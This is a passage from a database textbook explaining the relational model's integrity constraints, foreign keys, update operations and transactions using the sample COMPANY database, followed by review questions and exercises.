relation states DB = {r1, r2, …, rm} such that each ri is a state of Ri and such that the
ri relation states satisfy the integrity constraints specified in IC. Figure 5 shows a
relational database schema that we call COMPANY = {EMPLOYEE, DEPARTMENT,
DEPT_LOCATIONS, PROJECT, WORKS_ON, DEPENDENT}. The underlined attrib-
utes represent primary keys. Figure 6 shows a relational database state corres-
ponding to the COMPANY schema. We will use this schema and database state in
this chapter for developing sample queries in different relational languages.

When we refer to a relational database, we implicitly include both its schema and its
current state. A database state that does not obey all the integrity constraints is
called an invalid state, and a state that satisfies all the constraints in the defined set
of integrity constraints IC is called a valid state.

10A relational database state is sometimes called a relational database instance. However, as we men-
tioned earlier, we will not use the term instance since it also applies to single tuples.


EMPLOYEE
Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

DEPARTMENT
Dname Dnumber Mgr_ssn Mgr_start_date

DEPT_LOCATIONS
Dnumber Dlocation

PROJECT
Pname Pnumber Plocation Dnum

WORKS_ON
Essn Pno Hours

DEPENDENT
Essn Dependent_name Sex Bdate Relationship

Figure 5
Schema diagram for the COMPANY relational database schema.

In Figure 5, the Dnumber attribute in both DEPARTMENT and DEPT_LOCATIONS
stands for the same real-world concept—the number given to a department. That
same concept is called Dno in EMPLOYEE and Dnum in PROJECT. Attributes that
represent the same real-world concept may or may not have identical names in dif-
ferent relations. Alternatively, attributes that represent different concepts may have
the same name in different relations. For example, we could have used the attribute
name Name for both Pname of PROJECT and Dname of DEPARTMENT; in this case,
we would have two attributes that share the same name but represent different real-
world concepts—project names and department names.

In some early versions of the relational model, an assumption was made that the
same real-world concept, when represented by an attribute, would have identical
attribute names in all relations. This creates problems when the same real-world
concept is used in different roles (meanings) in the same relation. For example, the
concept of Social Security number appears twice in the EMPLOYEE relation of
Figure 5: once in the role of the employee’s SSN, and once in the role of the supervi-
sor’s SSN. We are required to give them distinct attribute names—Ssn and
Super_ssn, respectively—because they appear in the same relation and in order to
distinguish their meaning.

Each relational DBMS must have a data definition language (DDL) for defining a
relational database schema. Current relational DBMSs are mostly using SQL for this
purpose.


EMPLOYEE

Fname     Minit  Lname    Ssn        Bdate       Address                   Sex  Salary  Super_ssn  Dno
John      B      Smith    123456789  1965-01-09  731 Fondren, Houston, TX  M    30000   333445555  5
Franklin  T      Wong     333445555  1955-12-08  638 Voss, Houston, TX     M    40000   888665555  5
Alicia    J      Zelaya   999887777  1968-01-19  3321 Castle, Spring, TX   F    25000   987654321  4
Jennifer  S      Wallace  987654321  1941-06-20  291 Berry, Bellaire, TX   F    43000   888665555  4
Ramesh    K      Narayan  666884444  1962-09-15  975 Fire Oak, Humble, TX  M    38000   333445555  5
Joyce     A      English  453453453  1972-07-31  5631 Rice, Houston, TX    F    25000   333445555  5
Ahmad     V      Jabbar   987987987  1969-03-29  980 Dallas, Houston, TX   M    25000   987654321  4
James     E      Borg     888665555  1937-11-10  450 Stone, Houston, TX    M    55000   NULL       1

DEPARTMENT

Dname           Dnumber  Mgr_ssn    Mgr_start_date
Research        5        333445555  1988-05-22
Administration  4        987654321  1995-01-01
Headquarters    1        888665555  1981-06-19

DEPT_LOCATIONS

Dnumber  Dlocation
1        Houston
4        Stafford
5        Bellaire
5        Sugarland
5        Houston

WORKS_ON

Essn       Pno  Hours
123456789  1    32.5
123456789  2    7.5
666884444  3    40.0
453453453  1    20.0
453453453  2    20.0
333445555  2    10.0
333445555  3    10.0
333445555  10   10.0
333445555  20   10.0
999887777  30   30.0
999887777  10   10.0
987987987  10   35.0
987987987  30   5.0
987654321  30   20.0
987654321  20   15.0
888665555  20   NULL

PROJECT

Pname            Pnumber  Plocation  Dnum
ProductX         1        Bellaire   5
ProductY         2        Sugarland  5
ProductZ         3        Houston    5
Computerization  10       Stafford   4
Reorganization   20       Houston    1
Newbenefits      30       Stafford   4

DEPENDENT

Essn       Dependent_name  Sex  Bdate       Relationship
333445555  Alice           F    1986-04-05  Daughter
333445555  Theodore        M    1983-10-25  Son
333445555  Joy             F    1958-05-03  Spouse
987654321  Abner           M    1942-02-28  Spouse
123456789  Michael         M    1988-01-04  Son
123456789  Alice           F    1988-12-30  Daughter
123456789  Elizabeth       F    1967-05-05  Daughter

Figure 6
One possible database state for the COMPANY relational database schema.


Integrity constraints are specified on a database schema and are expected to hold on
every valid database state of that schema. In addition to domain, key, and NOT NULL
constraints, two other types of constraints are considered part of the relational
model: entity integrity and referential integrity.

2.4 Entity Integrity, Referential Integrity,
and Foreign Keys

The entity integrity constraint states that no primary key value can be NULL. This
is because the primary key value is used to identify individual tuples in a relation.
Having NULL values for the primary key implies that we cannot identify some
tuples. For example, if two or more tuples had NULL for their primary keys, we may
not be able to distinguish them if we try to reference them from other relations.

Key constraints and entity integrity constraints are specified on individual relations.
The referential integrity constraint is specified between two relations and is used
to maintain the consistency among tuples in the two relations. Informally, the refer-
ential integrity constraint states that a tuple in one relation that refers to another
relation must refer to an existing tuple in that relation. For example, in Figure 6, the
attribute Dno of EMPLOYEE gives the department number for which each employee
works; hence, its value in every EMPLOYEE tuple must match the Dnumber value of
some tuple in the DEPARTMENT relation.

To define referential integrity more formally, first we define the concept of a foreign
key. The conditions for a foreign key, given below, specify a referential integrity con-
straint between the two relation schemas R1 and R2. A set of attributes FK in rela-
tion schema R1 is a foreign key of R1 that references relation R2 if it satisfies the
following rules:

1. The attributes in FK have the same domain(s) as the primary key attributes
PK of R2; the attributes FK are said to reference or refer to the relation R2.

2. A value of FK in a tuple t1 of the current state r1(R1) either occurs as a value
of PK for some tuple t2 in the current state r2(R2) or is NULL. In the former
case, we have t1[FK] = t2[PK], and we say that the tuple t1 references or
refers to the tuple t2.

In this definition, R1 is called the referencing relation and R2 is the referenced rela-
tion. If these two conditions hold, a referential integrity constraint from R1 to R2 is
said to hold. In a database of many relations, there are usually many referential
integrity constraints.

To specify these constraints, first we must have a clear understanding of the mean-
ing or role that each attribute or set of attributes plays in the various relation
schemas of the database. Referential integrity constraints typically arise from the
relationships among the entities represented by the relation schemas. For example,
consider the database shown in Figure 6. In the EMPLOYEE relation, the attribute
Dno refers to the department for which an employee works; hence, we designate Dno
to be a foreign key of EMPLOYEE referencing the DEPARTMENT relation. This means
that a value of Dno in any tuple t1 of the EMPLOYEE relation must match a value of


the primary key of DEPARTMENT—the Dnumber attribute—in some tuple t2 of the
DEPARTMENT relation, or the value of Dno can be NULL if the employee does not
belong to a department or will be assigned to a department later. For example, in
Figure 6 the tuple for employee ‘John Smith’ references the tuple for the ‘Research’
department, indicating that ‘John Smith’ works for this department.

Notice that a foreign key can refer to its own relation. For example, the attribute
Super_ssn in EMPLOYEE refers to the supervisor of an employee; this is another
employee, represented by a tuple in the EMPLOYEE relation. Hence, Super_ssn is a
foreign key that references the EMPLOYEE relation itself. In Figure 6 the tuple for
employee ‘John Smith’ references the tuple for employee ‘Franklin Wong,’ indicating
that ‘Franklin Wong’ is the supervisor of ‘John Smith.’

We can diagrammatically display referential integrity constraints by drawing a directed
arc from each foreign key to the relation it references. For clarity, the arrowhead may
point to the primary key of the referenced relation. Figure 7 shows the schema in
Figure 5 with the referential integrity constraints displayed in this manner.

All integrity constraints should be specified on the relational database schema (i.e.,
defined as part of its definition) if we want to enforce these constraints on the data-
base states. Hence, the DDL includes provisions for specifying the various types of
constraints so that the DBMS can automatically enforce them. Most relational
DBMSs support key, entity integrity, and referential integrity constraints. These
constraints are specified as a part of data definition in the DDL.
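As a sketch of how this looks in the DDL, the two foreign keys of EMPLOYEE discussed above could be declared as follows; the remaining EMPLOYEE attributes are omitted here for brevity, and the complete COMPANY data definition appears in the Basic SQL chapter.

CREATE TABLE EMPLOYEE
( Ssn        CHAR(9)  NOT NULL,
  Super_ssn  CHAR(9),            -- supervisor's Ssn; may be NULL
  Dno        INT      NOT NULL,  -- department the employee works for
PRIMARY KEY (Ssn),
FOREIGN KEY (Super_ssn) REFERENCES EMPLOYEE(Ssn),        -- a foreign key may reference its own relation
FOREIGN KEY (Dno) REFERENCES DEPARTMENT(Dnumber) );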

2.5 Other Types of Constraints
The preceding integrity constraints are included in the data definition language
because they occur in most database applications. However, they do not include a
large class of general constraints, sometimes called semantic integrity constraints,
which may have to be specified and enforced on a relational database. Examples of
such constraints are the salary of an employee should not exceed the salary of the
employee’s supervisor and the maximum number of hours an employee can work on all
projects per week is 56. Such constraints can be specified and enforced within the
application programs that update the database, or by using a general-purpose
constraint specification language. Mechanisms called triggers and assertions can
be used. In SQL, CREATE ASSERTION and CREATE TRIGGER statements can be
used for this purpose. It is more common to check for these types of constraints
within the application programs than to use constraint specification languages
because the latter are sometimes difficult and complex to use.
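For instance, the first semantic constraint mentioned above could be written as an SQL assertion along the following lines; this is only a sketch, and the assertion name is arbitrary.

CREATE ASSERTION SALARY_CONSTRAINT
CHECK ( NOT EXISTS ( SELECT *
                     FROM   EMPLOYEE E, EMPLOYEE S
                     WHERE  E.Salary > S.Salary
                       AND  E.Super_ssn = S.Ssn ) );
-- Violated whenever some employee earns more than his or her supervisor.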

Another type of constraint is the functional dependency constraint, which establishes
a functional relationship among two sets of attributes X and Y. This constraint spec-
ifies that the value of X determines a unique value of Y in all states of a relation; it is
denoted as a functional dependency X → Y. We use functional dependencies and
other types of dependencies not detailed here as tools to analyze the quality of rela-
tional designs and to “normalize” relations to improve their quality.


EMPLOYEE
Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

DEPARTMENT
Dname Dnumber Mgr_ssn Mgr_start_date

DEPT_LOCATIONS
Dnumber Dlocation

PROJECT
Pname Pnumber Plocation Dnum

WORKS_ON
Essn Pno Hours

DEPENDENT
Essn Dependent_name Sex Bdate Relationship

Figure 7
Referential integrity constraints displayed
on the COMPANY relational database
schema.

The types of constraints we discussed so far may be called state constraints because
they define the constraints that a valid state of the database must satisfy. Another type
of constraint, called transition constraints, can be defined to deal with state changes
in the database.11 An example of a transition constraint is: “the salary of an employee
can only increase.” Such constraints are typically enforced by the application pro-
grams or specified using active rules and triggers.

3 Update Operations, Transactions,
and Dealing with Constraint Violations

The operations of the relational model can be categorized into retrievals and
updates. Retrievals are specified using the relational algebra operations.
A relational algebra expression forms a new relation after applying a number of
algebraic operators to an existing set of relations; its main use is for querying a data-
base to retrieve information. The user formulates a query that specifies the data of
interest, and a new relation is formed by applying relational operators to retrieve
this data. That result relation becomes the answer to (or result of) the user’s query.

11State constraints are sometimes called static constraints, and transition constraints are sometimes
called dynamic constraints.


The language called relational calculus is used to define the new relation declara-
tively without giving a specific order of operations.

In this section, we concentrate on the database modification or update operations.
There are three basic operations that can change the states of relations in the data-
base: Insert, Delete, and Update (or Modify). They insert new data, delete old data,
or modify existing data records. Insert is used to insert one or more new tuples in a
relation, Delete is used to delete tuples, and Update (or Modify) is used to change
the values of some attributes in existing tuples. Whenever these operations are
applied, the integrity constraints specified on the relational database schema should
not be violated. In this section we discuss the types of constraints that may be vio-
lated by each of these operations and the types of actions that may be taken if an
operation causes a violation. We use the database shown in Figure 6 for examples
and discuss only key constraints, entity integrity constraints, and the referential
integrity constraints shown in Figure 7. For each type of operation, we give some
examples and discuss any constraints that each operation may violate.

3.1 The Insert Operation
The Insert operation provides a list of attribute values for a new tuple t that is to be
inserted into a relation R. Insert can violate any of the four types of constraints dis-
cussed in the previous section. Domain constraints can be violated if an attribute
value is given that does not appear in the corresponding domain or is not of the
appropriate data type. Key constraints can be violated if a key value in the new tuple
t already exists in another tuple in the relation r(R). Entity integrity can be violated
if any part of the primary key of the new tuple t is NULL. Referential integrity can be
violated if the value of any foreign key in t refers to a tuple that does not exist in the
referenced relation. Here are some examples to illustrate this discussion.

■ Operation:
Insert <‘Cecilia’, ‘F’, ‘Kolonsky’, NULL, ‘1960-04-05’, ‘6357 Windy Lane, Katy, TX’, F, 28000, NULL, 4> into EMPLOYEE.
Result: This insertion violates the entity integrity constraint (NULL for the
primary key Ssn), so it is rejected.

■ Operation:
Insert <‘Alicia’, ‘J’, ‘Zelaya’, ‘999887777’, ‘1960-04-05’, ‘6357 Windy Lane, Katy, TX’, F, 28000, ‘987654321’, 4> into EMPLOYEE.
Result: This insertion violates the key constraint because another tuple with
the same Ssn value already exists in the EMPLOYEE relation, and so it is
rejected.

■ Operation:
Insert <‘Cecilia’, ‘F’, ‘Kolonsky’, ‘677678989’, ‘1960-04-05’, ‘6357 Windswept, Katy, TX’, F, 28000, ‘987654321’, 7> into EMPLOYEE.
Result: This insertion violates the referential integrity constraint specified on
Dno in EMPLOYEE because no corresponding referenced tuple exists in
DEPARTMENT with Dnumber = 7.


■ Operation:
Insert <‘Cecilia’, ‘F’, ‘Kolonsky’, ‘677678989’, ‘1960-04-05’, ‘6357 Windy Lane, Katy, TX’, F, 28000, NULL, 4> into EMPLOYEE.
Result: This insertion satisfies all constraints, so it is acceptable.

If an insertion violates one or more constraints, the default option is to reject the
insertion. In this case, it would be useful if the DBMS could provide a reason to
the user as to why the insertion was rejected. Another option is to attempt to correct
the reason for rejecting the insertion, but this is typically not used for violations
caused by Insert; rather, it is used more often in correcting violations for Delete and
Update. In the first operation, the DBMS could ask the user to provide a value for
Ssn, and could then accept the insertion if a valid Ssn value is provided. In opera-
tion 3, the DBMS could either ask the user to change the value of Dno to some valid
value (or set it to NULL), or it could ask the user to insert a DEPARTMENT tuple with
Dnumber = 7 and could accept the original insertion only after such an operation
was accepted. Notice that in the latter case the insertion violation can cascade back
to the EMPLOYEE relation if the user attempts to insert a tuple for department 7
with a value for Mgr_ssn that does not exist in the EMPLOYEE relation.
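In SQL (introduced in the next chapter), the first and fourth operations above would be expressed as INSERT statements such as the following sketch; the DBMS rejects the first because the primary key Ssn is NULL and accepts the second.

-- Rejected: violates entity integrity (NULL value for the primary key Ssn)
INSERT INTO EMPLOYEE
VALUES ('Cecilia', 'F', 'Kolonsky', NULL, '1960-04-05',
        '6357 Windy Lane, Katy, TX', 'F', 28000, NULL, 4);

-- Accepted: satisfies all of the constraints
INSERT INTO EMPLOYEE
VALUES ('Cecilia', 'F', 'Kolonsky', '677678989', '1960-04-05',
        '6357 Windy Lane, Katy, TX', 'F', 28000, NULL, 4);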

3.2 The Delete Operation
The Delete operation can violate only referential integrity. This occurs if the tuple
being deleted is referenced by foreign keys from other tuples in the database. To
specify deletion, a condition on the attributes of the relation selects the tuple (or
tuples) to be deleted. Here are some examples.

■ Operation:
Delete the WORKS_ON tuple with Essn = ‘999887777’ and Pno = 10.
Result: This deletion is acceptable and deletes exactly one tuple.

■ Operation:
Delete the EMPLOYEE tuple with Ssn = ‘999887777’.
Result: This deletion is not acceptable, because there are tuples in
WORKS_ON that refer to this tuple. Hence, if the tuple in EMPLOYEE is
deleted, referential integrity violations will result.

■ Operation:
Delete the EMPLOYEE tuple with Ssn = ‘333445555’.
Result: This deletion will result in even worse referential integrity violations,
because the tuple involved is referenced by tuples from the EMPLOYEE,
DEPARTMENT, WORKS_ON, and DEPENDENT relations.

Several options are available if a deletion operation causes a violation. The first
option, called restrict, is to reject the deletion. The second option, called cascade, is
to attempt to cascade (or propagate) the deletion by deleting tuples that reference the
tuple that is being deleted. For example, in operation 2, the DBMS could automati-
cally delete the offending tuples from WORKS_ON with Essn = ‘999887777’. A third
option, called set null or set default, is to modify the referencing attribute values that
cause the violation; each such value is either set to NULL or changed to reference


another default valid tuple. Notice that if a referencing attribute that causes a viola-
tion is part of the primary key, it cannot be set to NULL; otherwise, it would violate
entity integrity.

Combinations of these three options are also possible. For example, to avoid having
operation 3 cause a violation, the DBMS may automatically delete all tuples from
WORKS_ON and DEPENDENT with Essn = ‘333445555’. Tuples in EMPLOYEE with
Super_ssn = ‘333445555’ and the tuple in DEPARTMENT with Mgr_ssn = ‘333445555’
can have their Super_ssn and Mgr_ssn values changed to other valid values or to
NULL. Although it may make sense to delete automatically the WORKS_ON and
DEPENDENT tuples that refer to an EMPLOYEE tuple, it may not make sense to
delete other EMPLOYEE tuples or a DEPARTMENT tuple.

In general, when a referential integrity constraint is specified in the DDL, the DBMS
will allow the database designer to specify which of the options applies in case of a
violation of the constraint.
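In SQL, these options are attached to the FOREIGN KEY clause as referential triggered actions. The following is a sketch for the WORKS_ON foreign keys only; which action is appropriate for each foreign key is a design decision, as discussed above.

CREATE TABLE WORKS_ON
( Essn   CHAR(9)      NOT NULL,
  Pno    INT          NOT NULL,
  Hours  DECIMAL(3,1) NOT NULL,
PRIMARY KEY (Essn, Pno),
FOREIGN KEY (Essn) REFERENCES EMPLOYEE(Ssn)
    ON DELETE CASCADE,          -- deleting an employee also deletes his or her WORKS_ON tuples
FOREIGN KEY (Pno) REFERENCES PROJECT(Pnumber)
    ON DELETE RESTRICT );       -- reject deletion of a project that still has workers assigned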

3.3 The Update Operation
The Update (or Modify) operation is used to change the values of one or more
attributes in a tuple (or tuples) of some relation R. It is necessary to specify a condi-
tion on the attributes of the relation to select the tuple (or tuples) to be modified.
Here are some examples.

■ Operation:
Update the salary of the EMPLOYEE tuple with Ssn = ‘999887777’ to 28000.
Result: Acceptable.

■ Operation:
Update the Dno of the EMPLOYEE tuple with Ssn = ‘999887777’ to 1.
Result: Acceptable.

■ Operation:
Update the Dno of the EMPLOYEE tuple with Ssn = ‘999887777’ to 7.
Result: Unacceptable, because it violates referential integrity.

■ Operation:
Update the Ssn of the EMPLOYEE tuple with Ssn = ‘999887777’ to
‘987654321’.
Result: Unacceptable, because it violates primary key constraint by repeating
a value that already exists as a primary key in another tuple; it violates refer-
ential integrity constraints because there are other relations that refer to the
existing value of Ssn.

Updating an attribute that is neither part of a primary key nor of a foreign key usually
causes no problems; the DBMS need only check to confirm that the new value is of
the correct data type and domain. Modifying a primary key value is similar to delet-
ing one tuple and inserting another in its place because we use the primary key to
identify tuples. Hence, the issues discussed earlier in both Sections 3.1 (Insert) and
3.2 (Delete) come into play. If a foreign key attribute is modified, the DBMS must


make sure that the new value refers to an existing tuple in the referenced relation (or
is set to NULL). Similar options exist to deal with referential integrity violations
caused by Update as those options discussed for the Delete operation. In fact, when
a referential integrity constraint is specified in the DDL, the DBMS will allow the
user to choose separate options to deal with a violation caused by Delete and a vio-
lation caused by Update.
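As a sketch in SQL, the first and third operations above correspond to UPDATE statements like the following; the third is rejected when the referential integrity constraint on Dno is enforced.

-- Acceptable: Salary is neither a primary key nor a foreign key attribute
UPDATE EMPLOYEE
SET    Salary = 28000
WHERE  Ssn = '999887777';

-- Rejected: no DEPARTMENT tuple exists with Dnumber = 7
UPDATE EMPLOYEE
SET    Dno = 7
WHERE  Ssn = '999887777';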

3.4 The Transaction Concept
A database application program running against a relational database typically exe-
cutes one or more transactions. A transaction is an executing program that includes
some database operations, such as reading from the database, or applying inser-
tions, deletions, or updates to the database. At the end of the transaction, it must
leave the database in a valid or consistent state that satisfies all the constraints spec-
ified on the database schema. A single transaction may involve any number of
retrieval operations (as part of relational algebra and calculus, and as a part of the
language SQL), and any number of update operations. These retrievals and updates
will together form an atomic unit of work against the database. For example, a
transaction to apply a bank withdrawal will typically read the user account record,
check if there is a sufficient balance, and then update the record by the withdrawal
amount.
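As an illustration only, such a withdrawal transaction could be coded in SQL roughly as follows, assuming a hypothetical ACCOUNT(Account_no, Balance) relation that is not part of the COMPANY schema; the account number and amount are made up for the example.

START TRANSACTION;

SELECT Balance                      -- read the user's account record
FROM   ACCOUNT
WHERE  Account_no = 'A-101';

-- the application checks that the balance covers the requested amount

UPDATE ACCOUNT                      -- apply the withdrawal
SET    Balance = Balance - 500
WHERE  Account_no = 'A-101';

COMMIT;                             -- make the changes permanent; ROLLBACK would undo them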

A large number of commercial applications running against relational databases in
online transaction processing (OLTP) systems are executing transactions at rates
that reach several hundred per second.

4 Summary
In this chapter we presented the modeling concepts, data structures, and constraints
provided by the relational model of data. We started by introducing the concepts of
domains, attributes, and tuples. Then, we defined a relation schema as a list of
attributes that describe the structure of a relation. A relation, or relation state, is a
set of tuples that conforms to the schema.

Several characteristics differentiate relations from ordinary tables or files. The first
is that a relation is not sensitive to the ordering of tuples. The second involves the
ordering of attributes in a relation schema and the corresponding ordering of values
within a tuple. We gave an alternative definition of relation that does not require
these two orderings, but we continued to use the first definition, which requires
attributes and tuple values to be ordered, for convenience. Then, we discussed val-
ues in tuples and introduced NULL values to represent missing or unknown infor-
mation. We emphasized that NULL values should be avoided as much as possible.

We classified database constraints into inherent model-based constraints, explicit
schema-based constraints, and application-based constraints, otherwise known as
semantic constraints or business rules. Then, we discussed the schema constraints


pertaining to the relational model, starting with domain constraints, then key con-
straints, including the concepts of superkey, candidate key, and primary key, and the
NOT NULL constraint on attributes. We defined relational databases and relational
database schemas. Additional relational constraints include the entity integrity con-
straint, which prohibits primary key attributes from being NULL. We described the
interrelation referential integrity constraint, which is used to maintain consistency
of references among tuples from different relations.

The modification operations on the relational model are Insert, Delete, and Update.
Each operation may violate certain types of constraints (refer to Section 3).
Whenever an operation is applied, the database state after the operation is executed
must be checked to ensure that no constraints have been violated. Finally, we intro-
duced the concept of a transaction, which is important in relational DBMSs because
it allows the grouping of several database operations into a single atomic action on
the database.

Review Questions
1. Define the following terms as they apply to the relational model of data:

domain, attribute, n-tuple, relation schema, relation state, degree of a relation,
relational database schema, and relational database state.

2. Why are tuples in a relation not ordered?

3. Why are duplicate tuples not allowed in a relation?

4. What is the difference between a key and a superkey?

5. Why do we designate one of the candidate keys of a relation to be the pri-
mary key?

6. Discuss the characteristics of relations that make them different from ordi-
nary tables and files.

7. Discuss the various reasons that lead to the occurrence of NULL values in
relations.

8. Discuss the entity integrity and referential integrity constraints. Why is each
considered important?

9. Define foreign key. What is this concept used for?

10. What is a transaction? How does it differ from an Update operation?

Exercises
11. Suppose that each of the following Update operations is applied directly to

the database state shown in Figure 6. Discuss all integrity constraints vio-
lated by each operation, if any, and the different ways of enforcing these con-
straints.


a. Insert <‘Robert’, ‘F’, ‘Scott’, ‘943775543’, ‘1972-06-21’, ‘2365 Newcastle Rd, Bellaire, TX’, M, 58000, ‘888665555’, 1> into EMPLOYEE.

b. Insert <‘ProductA’, 4, ‘Bellaire’, 2> into PROJECT.

c. Insert <‘Production’, 4, ‘943775543’, ‘2007-10-01’> into DEPARTMENT.

d. Insert <‘677678989’, NULL, ‘40.0’> into WORKS_ON.

e. Insert <‘453453453’, ‘John’, ‘M’, ‘1990-12-12’, ‘spouse’> into DEPENDENT.

f. Delete the WORKS_ON tuples with Essn = ‘333445555’.

g. Delete the EMPLOYEE tuple with Ssn = ‘987654321’.

h. Delete the PROJECT tuple with Pname = ‘ProductX’.

i. Modify the Mgr_ssn and Mgr_start_date of the DEPARTMENT tuple with
Dnumber = 5 to ‘123456789’ and ‘2007-10-01’, respectively.

j. Modify the Super_ssn attribute of the EMPLOYEE tuple with Ssn =
‘999887777’ to ‘943775543’.

k. Modify the Hours attribute of the WORKS_ON tuple with Essn =
‘999887777’ and Pno = 10 to ‘5.0’.

12. Consider the AIRLINE relational database schema shown in Figure 8, which
describes a database for airline flight information. Each FLIGHT is identified
by a Flight_number, and consists of one or more FLIGHT_LEGs with
Leg_numbers 1, 2, 3, and so on. Each FLIGHT_LEG has scheduled arrival and
departure times, airports, and one or more LEG_INSTANCEs—one for each
Date on which the flight travels. FAREs are kept for each FLIGHT. For each
FLIGHT_LEG instance, SEAT_RESERVATIONs are kept, as are the AIRPLANE
used on the leg and the actual arrival and departure times and airports. An
AIRPLANE is identified by an Airplane_id and is of a particular
AIRPLANE_TYPE. CAN_LAND relates AIRPLANE_TYPEs to the AIRPORTs at
which they can land. An AIRPORT is identified by an Airport_code. Consider
an update for the AIRLINE database to enter a reservation on a particular
flight or flight leg on a given date.

a. Give the operations for this update.

b. What types of constraints would you expect to check?

c. Which of these constraints are key, entity integrity, and referential
integrity constraints, and which are not?

d. Specify all the referential integrity constraints that hold on the schema
shown in Figure 8.

13. Consider the relation CLASS(Course#, Univ_Section#, Instructor_name,
Semester, Building_code, Room#, Time_period, Weekdays, Credit_hours). This
represents classes taught in a university, with unique Univ_section#s. Identify
what you think should be various candidate keys, and write in your own
words the conditions or assumptions under which each candidate key would
be valid.


AIRPORT
Airport_code Name City State

FLIGHT
Flight_number Airline Weekdays

FLIGHT_LEG
Flight_number Leg_number Departure_airport_code Scheduled_departure_time
Arrival_airport_code Scheduled_arrival_time

LEG_INSTANCE
Flight_number Leg_number Date Number_of_available_seats Airplane_id
Departure_airport_code Departure_time Arrival_airport_code Arrival_time

FARE
Flight_number Fare_code Amount Restrictions

AIRPLANE_TYPE
Airplane_type_name Max_seats Company

CAN_LAND
Airplane_type_name Airport_code

AIRPLANE
Airplane_id Total_number_of_seats Airplane_type

SEAT_RESERVATION
Flight_number Leg_number Date Seat_number Customer_name Customer_phone

Figure 8
The AIRLINE relational database schema.

14. Consider the following six relations for an order-processing database appli-
cation in a company:

CUSTOMER(Cust#, Cname, City)
ORDER(Order#, Odate, Cust#, Ord_amt)
ORDER_ITEM(Order#, Item#, Qty)


ITEM(Item#, Unit_price)
SHIPMENT(Order#, Warehouse#, Ship_date)
WAREHOUSE(Warehouse#, City)

Here, Ord_amt refers to total dollar amount of an order; Odate is the date the
order was placed; and Ship_date is the date an order (or part of an order) is
shipped from the warehouse. Assume that an order can be shipped from sev-
eral warehouses. Specify the foreign keys for this schema, stating any
assumptions you make. What other constraints can you think of for this
database?

15. Consider the following relations for a database that keeps track of business
trips of salespersons in a sales office:

SALESPERSON(Ssn, Name, Start_year, Dept_no)
TRIP(Ssn, From_city, To_city, Departure_date, Return_date, Trip_id)
EXPENSE(Trip_id, Account#, Amount)

A trip can be charged to one or more accounts. Specify the foreign keys for
this schema, stating any assumptions you make.

16. Consider the following relations for a database that keeps track of student
enrollment in courses and the books adopted for each course:

STUDENT(Ssn, Name, Major, Bdate)
COURSE(Course#, Cname, Dept)
ENROLL(Ssn, Course#, Quarter, Grade)
BOOK_ADOPTION(Course#, Quarter, Book_isbn)
TEXT(Book_isbn, Book_title, Publisher, Author)

Specify the foreign keys for this schema, stating any assumptions you make.

17. Consider the following relations for a database that keeps track of automo-
bile sales in a car dealership (OPTION refers to some optional equipment
installed on an automobile):

CAR(Serial_no, Model, Manufacturer, Price)
OPTION(Serial_no, Option_name, Price)
SALE(Salesperson_id, Serial_no, Date, Sale_price)
SALESPERSON(Salesperson_id, Name, Phone)

First, specify the foreign keys for this schema, stating any assumptions you
make. Next, populate the relations with a few sample tuples, and then give an
example of an insertion in the SALE and SALESPERSON relations that
violates the referential integrity constraints and of another insertion that
does not.

18. Database design often involves decisions about the storage of attributes. For
example, a Social Security number can be stored as one attribute or split into
three attributes (one for each of the three hyphen-delineated groups of
numbers in a Social Security number—XXX-XX-XXXX). However, Social
Security numbers are usually represented as just one attribute. The decision


is based on how the database will be used. This exercise asks you to think
about specific situations where dividing the SSN is useful.

19. Consider a STUDENT relation in a UNIVERSITY database with the following
attributes (Name, Ssn, Local_phone, Address, Cell_phone, Age, Gpa). Note that
the cell phone may be from a different city and state (or province) from the
local phone. A possible tuple of the relation is shown below:

Name                         Ssn          Local_phone  Address                          Cell_phone  Age  Gpa
George Shaw William Edwards  123-45-6789  555-1234     123 Main St., Anytown, CA 94539  555-4321    19   3.75

a. Identify the critical missing information from the Local_phone and
Cell_phone attributes. (Hint: How do you call someone who lives in a dif-
ferent state or province?)

b. Would you store this additional information in the Local_phone and
Cell_phone attributes or add new attributes to the schema for STUDENT?

c. Consider the Name attribute. What are the advantages and disadvantages
of splitting this field from one attribute into three attributes (first name,
middle name, and last name)?

d. What general guideline would you recommend for deciding when to store
information in a single attribute and when to split the information?

e. Suppose the student can have between 0 and 5 phones. Suggest two differ-
ent designs that allow this type of information.

20. Recent changes in privacy laws have disallowed organizations from using
Social Security numbers to identify individuals unless certain restrictions are
satisfied. As a result, most U.S. universities cannot use SSNs as primary keys
(except for financial data). In practice, Student_id, a unique identifier
assigned to every student, is likely to be used as the primary key rather than
SSN since Student_id can be used throughout the system.

a. Some database designers are reluctant to use generated keys (also known
as surrogate keys) for primary keys (such as Student_id) because they are
artificial. Can you propose any natural choices of keys that can be used to
identify the student record in a UNIVERSITY database?

b. Suppose that you are able to guarantee uniqueness of a natural key that
includes last name. Are you guaranteed that the last name will not change
during the lifetime of the database? If last name can change, what solu-
tions can you propose for creating a primary key that still includes last
name but remains unique?

c. What are the advantages and disadvantages of using generated (surro-
gate) keys?


Selected Bibliography
The relational model was introduced by Codd (1970) in a classic paper. Codd also
introduced relational algebra and laid the theoretical foundations for the relational
model in a series of papers (Codd 1971, 1972, 1972a, 1974); he was later given the
Turing Award, the highest honor of the ACM (Association for Computing
Machinery) for his work on the relational model. In a later paper, Codd (1979) dis-
cussed extending the relational model to incorporate more meta-data and seman-
tics about the relations; he also proposed a three-valued logic to deal with
uncertainty in relations and incorporating NULLs in the relational algebra. The
resulting model is known as RM/T. Childs (1968) had earlier used set theory to
model databases. Later, Codd (1990) published a book examining over 300 features
of the relational data model and database systems. Date (2001) provides a retro-
spective review and analysis of the relational data model.

Since Codd’s pioneering work, much research has been conducted on various
aspects of the relational model. Todd (1976) describes an experimental DBMS
called PRTV that directly implements the relational algebra operations. Schmidt
and Swenson (1975) introduce additional semantics into the relational model by
classifying different types of relations. Chen’s (1976) Entity-Relationship model is a
means to communicate the real-world semantics of a relational database at the con-
ceptual level. Wiederhold and Elmasri (1979) introduce various types of connec-
tions between relations to enhance its constraints. Maier (1983) and Atzeni and De
Antonellis (1993) provide an extensive theoretical treatment of the relational data
model.


Basic SQL

The SQL language may be considered one of the major reasons for the commercial success of rela-
tional databases. Because it became a standard for relational databases, users were
less concerned about migrating their database applications from other types of
database systems—for example, network or hierarchical systems—to relational sys-
tems. This is because even if the users became dissatisfied with the particular rela-
tional DBMS product they were using, converting to another relational DBMS
product was not expected to be too expensive and time-consuming because both
systems followed the same language standards. In practice, of course, there are many
